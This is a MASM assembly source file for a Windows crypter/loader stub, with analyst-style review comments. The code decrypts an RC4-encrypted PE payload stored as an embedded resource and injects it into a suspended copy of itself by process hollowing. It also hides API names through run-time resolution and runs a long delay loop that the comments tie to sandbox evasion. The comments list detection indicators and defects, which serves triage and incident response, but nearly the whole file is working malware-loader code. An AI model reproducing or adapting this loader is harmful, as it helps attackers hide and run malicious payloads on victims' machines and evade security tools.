;Compiled with MASM
; 32-bit Windows, flat model, stdcall. Case-sensitive symbols.
; NOTE(review): this unit is a crypter/loader stub -- see ExtractFile.
; All mutable globals used below (rc4keytable, mPath, hInstance, temp,
; hResourceSize, ResInf, password, find1..find4, loop_stopper) are
; expected to come from 123.inc, which is not part of this listing.
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\ntdll.inc
include 123.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
; ntdll is linked statically, so ZwUnmapViewOfSection (called directly in
; ExtractFile) shows up in the import table even though other APIs are
; resolved at run time -- a useful static indicator for triage.
includelib \masm32\lib\ntdll.lib
.code
;-----------------------------------------------------------------------
; Rc4_setkey(Pass, LenPass) -- RC4 key-scheduling algorithm (KSA).
; Fills the global 256-byte state `rc4keytable` (declared in 123.inc,
; not visible here) with the permutation derived from the key bytes
; Pass[0..LenPass-1]. All registers are preserved via pushad/popad.
; Review notes:
;  * RC4 is a broken cipher; here it only obscures the embedded payload,
;    and the caller feeds it a fixed string (`password`).
;  * LenPass == 0 is not rejected: `dec esi` wraps to 0FFFFFFFFh and the
;    loop keeps reading Pass[bl] for all 256 rounds (out-of-bounds read).
;  * Only `bl` indexes the key, so a key longer than 256 bytes is read
;    modulo 256 while esi still counts down the full length.
;  * The state is a shared global: not reentrant.
;-----------------------------------------------------------------------
Rc4_setkey proc Pass:DWORD, LenPass:DWORD
pushad
; Identity permutation S[i] = i, written 4 bytes at a time from the top:
; eax = 0FFFEFDFCh (little-endian bytes 0FCh..0FFh) lands in S[252..255],
; then 04040404h less for each lower dword, down to S[0..3] = 00 01 02 03.
mov eax, 0FFFEFDFCh
mov ecx, 256/4
Init_rc4keytable:
mov dword ptr [rc4keytable+4*ecx-4], eax
sub eax, 04040404h
dec ecx
jnz Init_rc4keytable
; Register roles for the mixing loop:
;   cl    = i (0..255; ecx is exactly 0 when the init loop exits)
;   al    = j (eax zeroed here, so [rc4keytable+eax] is indexed mod 256)
;   edi   = key base, bl = index into the key, esi = key bytes left
;   dl/dh = S[i], S[j] temporaries for the swap
xor eax, eax
mov edi, Pass
Key_return:
; (Re)start at key byte 0 with the full key length outstanding.
xor ebx, ebx
mov esi ,LenPass
jmp New_key
Key_loop:
inc bl
dec esi
jz Key_return                        ; key exhausted -> wrap to Pass[0]
New_key:
mov dl, byte ptr [rc4keytable+ecx]   ; dl = S[i]
add al, byte ptr [edi+ebx]           ; j += key[k]
add al, dl                           ; j += S[i]   (mod 256 via al)
mov dh, byte ptr [rc4keytable+eax]   ; dh = S[j]
mov byte ptr [rc4keytable+ecx], dh   ; swap S[i] <-> S[j]
mov byte ptr [rc4keytable+eax], dl
inc cl
jnz Key_loop                         ; 256 rounds: stop when i wraps to 0
popad
ret
Rc4_setkey endp
;-----------------------------------------------------------------------
; Rc4_crypt(iData, LenData) -- RC4 PRGA. XORs LenData bytes at iData in
; place with the keystream, so one routine both encrypts and decrypts.
; Requires a prior Rc4_setkey. After the data is processed the whole
; 256-byte `rc4keytable` is overwritten with zeros, so the key schedule
; is single-use: a second Rc4_crypt needs a fresh Rc4_setkey.
; If LenData is 0 the routine returns immediately and the state is NOT
; wiped. All registers are preserved via pushad/popad.
;-----------------------------------------------------------------------
Rc4_crypt proc iData:DWORD, LenData:DWORD
pushad
mov edi, LenData                     ; edi = bytes remaining
mov esi, iData                       ; esi = current data pointer
test edi, edi
jz Rc4_enc_exit
; Register roles: bl = i, al = j, dl = S[i], cl = S[j] then S[S[i]+S[j]].
; Only the low bytes are ever written, so all table indexes stay in 0..255.
xor eax, eax
xor edx, edx
xor ecx, ecx
xor ebx, ebx
Rc4_enc_loop:
inc bl                               ; i = i + 1
mov dl, byte ptr [rc4keytable+ebx]   ; dl = S[i]
add al, dl                           ; j = j + S[i]
mov cl, byte ptr [rc4keytable+eax]   ; cl = S[j]
mov byte ptr [rc4keytable+ebx], cl   ; swap S[i] <-> S[j]
mov byte ptr [rc4keytable+eax], dl
add cl, dl                           ; cl = S[i] + S[j]  (post-swap values)
mov cl, byte ptr [rc4keytable+ecx]   ; keystream byte K = S[S[i] + S[j]]
xor byte ptr [esi], cl               ; data[n] ^= K
inc esi
dec edi
jnz Rc4_enc_loop
; Wipe the key schedule: 64 zero dwords over the 256-byte rc4keytable.
xor eax, eax
mov edi, offset rc4keytable
mov ecx, 256/4
cld
rep stosd
Rc4_enc_exit:
popad
ret
Rc4_crypt endp
;-----------------------------------------------------------------------
; getadress(module, funcion) -- run-time export resolution:
;   LoadLibrary(module), then GetProcAddress(handle, funcion).
; Returns the address in BOTH eax and ebx (callers in this file read one
; or the other). Review notes:
;  * ebx is callee-saved under stdcall and is clobbered here.
;  * Neither result is NULL-checked: a failed LoadLibrary feeds NULL to
;    GetProcAddress and the caller receives 0 with no diagnostic.
;  * FreeLibrary is commented out, so the module reference is never
;    released (keeps the returned pointer valid, leaks a refcount per call).
;  * Resolving APIs through strings supplied by 123.inc (find1..find4)
;    keeps those names out of the import table -- presumably to hinder
;    static analysis; recover the strings from 123.inc / the built binary.
;-----------------------------------------------------------------------
getadress proc module:DWORD,funcion:DWORD
LOCAL fh:HMODULE
push module
call LoadLibrary
mov fh,eax
push funcion
push fh
call GetProcAddress
mov ebx,eax                          ; duplicate the result into ebx (see header)
;invoke FreeLibrary,fh
ret
getadress endp
;-----------------------------------------------------------------------
; ExtractFile -- process-hollowing ("RunPE") loader. Analyst summary:
;  1. Locate RCDATA resource #1212 in this module, lock it and RC4-decrypt
;     it in place using the fixed key string `password` (from 123.inc).
;     The decrypted blob is treated as a complete PE image.
;  2. CreateProcess this same executable (mPath) with CREATE_SUSPENDED.
;  3. ZwUnmapViewOfSection the child's image, VirtualAllocEx RWX memory
;     at the payload's preferred ImageBase, WriteProcessMemory the headers
;     and every section, set the main thread's Eax to the payload entry
;     point, ResumeThread.
; Detection / IR hooks visible here: suspended self-spawn, then
; NtUnmapViewOfSection + VirtualAllocEx(PAGE_EXECUTE_READWRITE) +
; WriteProcessMemory + SetThreadContext + ResumeThread from the parent.
; The payload is recoverable by RC4-decrypting resource 1212 with the
; key string in 123.inc.
; Review notes (defects visible in this listing):
;  * No return value of CreateProcess, GetThreadContext, VirtualAllocEx,
;    WriteProcessMemory or SetThreadContext is checked; the PE blob is
;    trusted blindly (e_lfanew, NumberOfSections, section offsets/sizes
;    are never bounded against hResourceSize).
;  * The unmap address comes from GetModuleHandle(0) in the PARENT, i.e.
;    it assumes the suspended child is mapped at the same base address.
;  * Only the Eax field of the thread context is rewritten.
;  * API resolution is inconsistent: some calls go through getadress
;    (names hidden as find1..find4 in 123.inc), CreateProcess and
;    WriteProcessMemory are also imported directly, and one resolved
;    pointer (`temp`) is fetched and then never used.
;  * RC4-decrypting in place writes through the LockResource pointer into
;    the mapped .rsrc section; that only works if the section is writable
;    in this build, which cannot be confirmed from the listing.
;  * The two inner failure paths fall out of the .endif ladder and return
;    with no error indication.
; Globals mPath, hInstance, temp, hResourceSize, ResInf, password and the
; find* strings are declared in 123.inc (not shown).
;-----------------------------------------------------------------------
ExtractFile proc
local hResource:dword
LOCAL sinfo: STARTUPINFO
LOCAL pinfo: PROCESS_INFORMATION
LOCAL base: dword                    ; remote image base returned by VirtualAllocEx
LOCAL sec: ptr IMAGE_SECTION_HEADER  ; first section header of the payload
LOCAL cnt: CONTEXT
; mPath = full path of this executable: GetModuleFileName(NULL, mPath, 256).
push 256
push offset mPath
push 0
call GetModuleFileName
push 0
call GetModuleHandle
mov hInstance, eax
; Resolve the export named by find2 in module find1 (strings in 123.inc);
; getadress leaves the address in ebx. The call pushes (hInstance, 1212,
; RT_RCDATA), i.e. the argument shape of FindResource(hModule, name, type).
invoke getadress,addr find1,addr find2
mov temp,ebx
push RT_RCDATA
push 1212
push hInstance
call temp
.if eax == 0
invoke ExitProcess,0                 ; resource missing -> silent exit
.else
mov hResource, eax
;invoke SizeofResource, hInstance, hResource
push hResource
push hInstance
call SizeofResource
.if eax != 0
mov hResourceSize, eax
;invoke LoadResource, hInstance, hResource
push hResource
push hInstance
call LoadResource
; invoke getadress,find1,find8
;mov temp,ebx
;push hResource
;push hInstance
;call temp
.if eax != 0
invoke LockResource, eax
mov ResInf , eax                     ; ResInf -> encrypted payload bytes
; Decrypt the payload in place; key = the NUL-terminated `password` string.
invoke lstrlen,addr password
invoke Rc4_setkey,addr password,eax
invoke Rc4_crypt,ResInf,hResourceSize
invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
;invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
; NOTE(review): find1/find4 are passed by value here (the other two
; getadress calls use `addr`), and the resolved `temp` is never called --
; CreateProcess is invoked directly just below.
invoke getadress,find1,find4
mov temp,eax
; Spawn a suspended copy of this executable as the hollowing target.
lea edx,pinfo
push edx                             ; lpProcessInformation
lea edx,sinfo
push edx                             ; lpStartupInfo
push 0                               ; lpCurrentDirectory
push 0                               ; lpEnvironment
push CREATE_SUSPENDED                ; dwCreationFlags
push 0                               ; bInheritHandles
push 0                               ; lpThreadAttributes
push 0                               ; lpProcessAttributes
push 0                               ; lpCommandLine
push offset mPath                    ; lpApplicationName
call CreateProcess
invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
mov cnt.ContextFlags, CONTEXT_INTEGER
invoke GetThreadContext, pinfo.hThread, addr cnt
; invoke GetModuleHandle, 0
; Unmap the child's original image at the PARENT's own base address
; (assumes child and parent were mapped at the same address).
push 0
call GetModuleHandle
; invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
push eax
push pinfo.hProcess
call ZwUnmapViewOfSection
; edi -> IMAGE_NT_HEADERS of the decrypted payload (via e_lfanew, unchecked).
mov edi, ResInf
add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
assume edi: ptr IMAGE_NT_HEADERS
; Reserve+commit SizeOfImage bytes, RWX, at the payload's preferred base.
invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
mov base, eax
;invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
; Headers are written through an export resolved by find3; the pushed
; arguments match WriteProcessMemory(hProcess, base, ResInf, size, NULL).
invoke getadress,addr find1,addr find3
mov temp,eax
push 0
push [edi].OptionalHeader.SizeOfHeaders
push ResInf
push base
push pinfo.hProcess
call temp
; sec = &OptionalHeader + SizeOfOptionalHeader = first IMAGE_SECTION_HEADER.
lea eax, [edi].OptionalHeader
mov sec, eax
movzx eax, [edi].FileHeader.SizeOfOptionalHeader
add sec, eax
xor eax, eax
xor esi, esi                         ; esi = section index
xor ecx, ecx
; Copy each section's raw data to base + VirtualAddress in the child.
; PointerToRawData / SizeOfRawData are taken from the blob unchecked.
.while ( si < [edi].FileHeader.NumberOfSections )
imul eax, esi, sizeof IMAGE_SECTION_HEADER
add eax, sec                         ; eax -> IMAGE_SECTION_HEADER[esi]
mov ebx, base
add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
mov edx, ResInf
add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
inc esi
.endw
; Redirect the suspended main thread: Eax = base + AddressOfEntryPoint.
; No other field of the saved context is changed.
mov eax, base
add eax, [edi].OptionalHeader.AddressOfEntryPoint
mov cnt.regEax, eax
invoke SetThreadContext, pinfo.hThread, addr cnt
invoke ResumeThread, pinfo.hThread
ret
.endif
.endif
.endif
ExtractFile endp
;-----------------------------------------------------------------------
; Program entry. Spins 500,000,000 iterations of a do-nothing loop before
; running the loader: a CPU-bound delay that makes no API call, which is
; consistent with sandbox/emulator time-out evasion (intent inferred, not
; stated in the source). Then ExtractFile, then ExitProcess(0).
; The `cmp loop_stopper, 0` result is discarded -- `dec` rewrites the
; flags that `jg` tests, so the loop repeats while the decremented
; counter is still > 0 (signed). loop_stopper is a global from 123.inc.
;-----------------------------------------------------------------------
_entrypoint:
mov loop_stopper,500000000
loop_start:
mov eax,0                            ; filler: no observable effect
push eax
pop eax
cmp loop_stopper, 0                  ; flags overwritten by the next dec
dec loop_stopper
jg loop_start
invoke ExtractFile
invoke ExitProcess, 0
end _entrypoint